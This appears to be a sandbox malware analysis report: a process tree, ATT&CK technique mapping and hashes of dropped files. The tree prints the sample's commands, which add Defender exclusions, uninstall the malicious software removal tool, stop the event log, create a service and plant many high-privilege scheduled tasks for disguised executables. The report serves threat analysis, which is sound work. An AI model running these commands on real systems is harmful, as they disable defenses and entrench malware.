C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\wininit.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Utility.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AA0bfbf7qt.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:4068
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:2084
-
-
C:\Recovery\WindowsRE\Utility.exe"C:\Recovery\WindowsRE\Utility.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3324
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Utility.exe"C:\Users\Admin\AppData\Local\Temp\Utility.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1344 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:2900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4448
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵PID:3924
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:4300
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:792
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵PID:856
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "QHRAJGDI"3⤵
- Launches sc.exe
PID:2120
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "QHRAJGDI" binpath= "C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe" start= "auto"3⤵
- Launches sc.exe
PID:1428
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:3744
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "QHRAJGDI"3⤵
- Launches sc.exe
PID:4128
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Users\Default\PrintHood\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4136
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Default\PrintHood\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\blockcontainerWincrtdll\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\blockcontainerWincrtdll\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2348
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\blockcontainerWincrtdll\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3636
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Program Files\MSBuild\Microsoft\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Reference Assemblies\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Reference Assemblies\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "UtilityU" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\Utility.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Utility" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Utility.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "UtilityU" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\Utility.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4528
-
C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exeC:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3664
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:4212
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:1988
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:2232
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:4564
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2348
-
-
C:\Windows\system32\conhost.execonhost.exe2⤵PID:1360
-
-
C:\Users\Default\PrintHood\Idle.exeC:\Users\Default\PrintHood\Idle.exe1⤵
- Executes dropped EXE
PID:4484
-
C:\Program Files\Reference Assemblies\wininit.exe"C:\Program Files\Reference Assemblies\wininit.exe"1⤵
- Executes dropped EXE
PID:4412
-
C:\blockcontainerWincrtdll\dllhost.exeC:\blockcontainerWincrtdll\dllhost.exe1⤵
- Executes dropped EXE
PID:4052
-
C:\Recovery\WindowsRE\Utility.exeC:\Recovery\WindowsRE\Utility.exe1⤵
- Executes dropped EXE
PID:1724
-
C:\Program Files\MSBuild\Microsoft\cmd.exe"C:\Program Files\MSBuild\Microsoft\cmd.exe"1⤵
- Executes dropped EXE
PID:4016
-
C:\Users\Default\PrintHood\Idle.exeC:\Users\Default\PrintHood\Idle.exe1⤵
- Executes dropped EXE
PID:2192
-
C:\Program Files\Reference Assemblies\wininit.exe"C:\Program Files\Reference Assemblies\wininit.exe"1⤵
- Executes dropped EXE
PID:2224
-
C:\blockcontainerWincrtdll\dllhost.exeC:\blockcontainerWincrtdll\dllhost.exe1⤵
- Executes dropped EXE
PID:2528
-
C:\Recovery\WindowsRE\Utility.exeC:\Recovery\WindowsRE\Utility.exe1⤵
- Executes dropped EXE
PID:4740
-
C:\Users\Default\PrintHood\Idle.exeC:\Users\Default\PrintHood\Idle.exe1⤵
- Executes dropped EXE
PID:1244
-
C:\Program Files\MSBuild\Microsoft\cmd.exe"C:\Program Files\MSBuild\Microsoft\cmd.exe"1⤵
- Executes dropped EXE
PID:4972
-
C:\Program Files\Reference Assemblies\wininit.exe"C:\Program Files\Reference Assemblies\wininit.exe"1⤵
- Executes dropped EXE
PID:164
-
C:\Users\Default\PrintHood\Idle.exeC:\Users\Default\PrintHood\Idle.exe1⤵
- Executes dropped EXE
PID:1524
-
C:\blockcontainerWincrtdll\dllhost.exeC:\blockcontainerWincrtdll\dllhost.exe1⤵
- Executes dropped EXE
PID:1952
-
C:\Recovery\WindowsRE\Utility.exeC:\Recovery\WindowsRE\Utility.exe1⤵
- Executes dropped EXE
PID:1732
-
C:\Program Files\MSBuild\Microsoft\cmd.exe"C:\Program Files\MSBuild\Microsoft\cmd.exe"1⤵
- Executes dropped EXE
PID:1580
-
C:\Program Files\Reference Assemblies\wininit.exe"C:\Program Files\Reference Assemblies\wininit.exe"1⤵
- Executes dropped EXE
PID:4616
-
C:\Users\Default\PrintHood\Idle.exeC:\Users\Default\PrintHood\Idle.exe1⤵
- Executes dropped EXE
PID:4544
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
847B
MD5ffd07202965cc8d2106fe0866224d425
SHA1102aae2319ed83e56a862b2525d58e57d8fe9f9a
SHA2563e8458b928401cad08ef5cfc2c86706a15ef67d03f0c010b6ca4651370b97df2
SHA512fdcab2ce6f65f28ec9da146b04ab4f38e0ee857a4fa70ced68abddfc16156ae466dca072f0820f83d935f89002484e9ade1e9f35a5df516793090ec95fafcbbb
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD51b54a7ee5778574a6c311d3ceb1916c3
SHA180442668650b57702c322e5550870ff899b30a01
SHA2561f270e97421c1ddb20f09af586fb026a040d409b4a3108dd6cde7d8d7389eb52
SHA51233762a47c21713909d759ea57406a8e8ebe2e080ce19e4ef0761de01ca958859740a78d9e3f7b5c8200f5a990fc42088d751eac9f12a94ba4f05abde0d4789f7
-
Filesize
1KB
MD538f6c7cdda155e14cf539450ce80010e
SHA1f8dc0603887968ae946ef4bc34e90f584e7661c9
SHA256d76ce66bd78f1293fbbbe3851475af4a21d5c210e3f692a79a312c98e3b72bdd
SHA512064cbd065e76133869687feb34c09a1df125161d571ce4ccebef3ae677923cdebfc6917170fcebf95a44905bd0e0b17b6548351b724d3119242718d1a4e9061e
-
Filesize
1KB
MD5af4288e031989efa429cc4c3d531df82
SHA152e3cfef9c8c9f7a2aebc8b7373b71db3b05e3c2
SHA256dba5d5d24b39da8df9d0737a0ae3f6601441da6e7963f3d80a79a9912b96139e
SHA512fe29704acde5322ddc236c3d6934b52a7afbb805c98128c9081107d4893cb5b11d0f4e48813f6b8d1c0f8a68615c980a21a89f2f605510f7ab9662039325b877
-
Filesize
1KB
MD5fc98fb64459f3ffc71c9b98bf6a470cc
SHA15da8d66679e7449129d52142c840ac4a6dfda7d7
SHA2565cf6bd23e2166d21d2178570c4f04cac1c030d67173abfebb05a407e15c47979
SHA5124a781d9ea4a321b75e4d8722f5b1252094450ec1a06418eb86b69d460fe82722c4157deeb731731a870c42377230c34f7aabdefc06494ecd1c918c0f06a818d1
-
Filesize
209B
MD5983c657089fad5cfe71d42f5968a6754
SHA16823125f2f675e3b1faea5f8c98cf01ebde23cf1
SHA2569527c3b6e8f375543cbc0dc73f149464661895e1fe50a1e1c6f4e3ea0a1be4b2
SHA51226234362593e275d653a81ddb6ba0ed3741039423d3b08185f529b4aedcee5010fe1eeea3e21aa5c073bf438afb5b8423203a95ff0712d410c4f190d8ba2ac74
-
Filesize
3.9MB
MD51003b37d9d942d41a38a83670eaa285c
SHA1a4ee7ef69fc681caf1116d59578667abb9080ad6
SHA256d822b616ee7e10b00fead9be9eb0cf9780fdb0b3fec3001ff31c9ce0cb7255ae
SHA5120c6f4e063cc22ee3c076c95bf5ea1cb593e5b6f40e4f2b8d3723a5c18c14eeecf568dad2a16599967c56588f4918cecd996e475fd20615b07c99de4800309f9a
-
Filesize
1KB
MD5e66a231b8de91e5224bd6eb9bca7b214
SHA1cb67f4b6e5accc459c679c092f0dcf535d18b498
SHA2563058f3d67ab347f0a7223830b23ecff2d77f2dfb387530f364acde2a7cb74302
SHA5121038bd443f9b9ba1fe006164218024c22974a199b195752d084e06e20c8e7959058d88bcc88b251422d6873ac7459d0e11677819c8bb9e2ba7c8e1f0507eb042
-
Filesize
5.0MB
MD5b1ac2ea973651a70ea72597e13a10f0a
SHA107e7cdedc54067a46b1d42cdf8a2c9050c3d3419
SHA256e2cb500c902da55ac07cbfbe30b8d1cef8781e55f0439ed601672636c3ab8c47
SHA51202b0dbc8a31ca440027a6c07d618a92bb520567ccd338c28dfcb86faa5b56c866564cf1a05b1754dcfeb252d12d76da57fd2de87804454f0ef1097431764c1f0
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
228B
MD54f702b152f4098393712e3fe99b04fbd
SHA1fec2f913e1fac5053127e175f1ba048c9d8dd25c
SHA256f0e2bfb22d22aed8ac10eff5a010fad081a5798706b3a6fd7764798cab716eb2
SHA5127c0844d6591b694d77ecf3d070eb3f70fd99427e41d62167aa58c98c1966a8065d90beb82ab0aa0a42bb80edb3c205dd07bb1d4fc03d989a0cb4df8993635fbf
-
Filesize
3.6MB
MD5bf0f63bb48eb95aaec6fc6a001c974ce
SHA119baab2b0c129ecbd6a1aa21bada3e2e5cdd1136
SHA256bbb080aed81b8f4d0f5d590c7cb0e56e68da5a27d32d964c32e50e1cb2015edc
SHA512130f08a7c4901ef47e7d21effe83c19fa442f2ade97967c11e646f949a9e8c2c46e8272a31a5b75f6c279009530cd101a562f1ab31a28fe410273cd69bf6c28c
-
Filesize
201B
MD5159297f9e35114bf97d74622097780d8
SHA12aaaf993b9ecb9bae43ccd41585734512ff08355
SHA256650c37c1afde471e40f77d7aec8603382214e9ec318b7f08ab7653f9c4e87f81
SHA512a82faa2f64caf669d44eac03705e34bea213c9a74ed73950bd8d2158d1c256ca290b7ffece866c3a03c36a091be70d92157353782061e184e5d44ac937949f69
-
Filesize
367B
MD5823d165b6f343e7b54df7aabb51f83b1
SHA184230e1e9079b069fe4992453fa37798f42d7afe
SHA256d111a04b4d9dc002fef74a525db7ce6a991e6334450924e02dd0a7cf6ba065e9
SHA5129482478076e27a2b89c8450c4073b2688cbc6c21c6658bdbcd571e46886bd07e4987690868d4ed33b8b1ff897e581cf562c19afa855267b713f925a2db16ad79
-
Filesize
235B
MD590b0d35d74f34d7384ada7f5a08ae5db
SHA1206591f54ccc40b174eddef037f3b89805aa25c4
SHA2569e85683776682cc2aad49b5ba7eb85e7130c0d6c3f4025f023fb0bced112baf7
SHA512733c2d45e9549565f3990d473a33b5e8b4b971aa4fdc75990edbb56a4dcc112b73acf99d4d672ca5a1e6046570bda7bd16d359896c80dadf8f40da32b0bdea01
-
Filesize
1KB
MD535d2029ed56d02bdd5f6f26e72234b06
SHA1e3fcc132b8af4e099a5e614d8736689d87e1b83a
SHA256e0ffde280f68e8f5f0059b987cf1e49557fc03f02e901fc3d1596e0f7f5d8881
SHA512e3044d3870dec2c132d936394b255eabe771c568abf1dd344530f48233d3f8b0266d2fcdbfc2dd88941c94c1d761a39227dff41673fe2b1d1aa371ace8a7a0df